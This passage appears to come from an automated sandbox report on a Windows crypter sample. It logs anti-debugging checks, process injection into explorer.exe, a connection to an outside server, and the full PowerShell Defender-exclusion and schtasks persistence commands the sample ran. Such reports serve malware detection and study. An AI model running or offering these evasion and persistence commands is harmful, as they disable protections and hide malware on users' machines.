            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B93DE3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B93DE3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B93DE3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B395EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBFDD3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B015C1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B8A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F527 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F527 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F527 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC3518 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC3518 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC3518 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09515 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0751A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0751A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0751A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0751A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BACD04 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B28D76 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B27D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B44D51 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBFD52 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B43D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B83540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB3D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0354C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB8D47 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B04CB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B134B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3D4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B964B5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD9CB3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B114A9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B114A9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B934A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exeDomain query: www.somethingyourselves.com
            Source: C:\Windows\explorer.exeNetwork Connect: 103.193.185.8 80
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: D90000
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeThread APC queued: target process: C:\Windows\explorer.exe
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeThread register set: target process: 3528
            Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3528
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp8C7A.tmp
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: explorer.exe, 0000000E.00000000.473602299.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.444035794.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389456185.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
            Source: explorer.exe, 0000000E.00000000.473602299.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.484036893.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.454888148.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000E.00000000.473602299.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.444035794.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389456185.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000000E.00000000.443354268.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.388566345.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.473028657.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
            Source: explorer.exe, 0000000E.00000000.473602299.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.444035794.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389456185.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
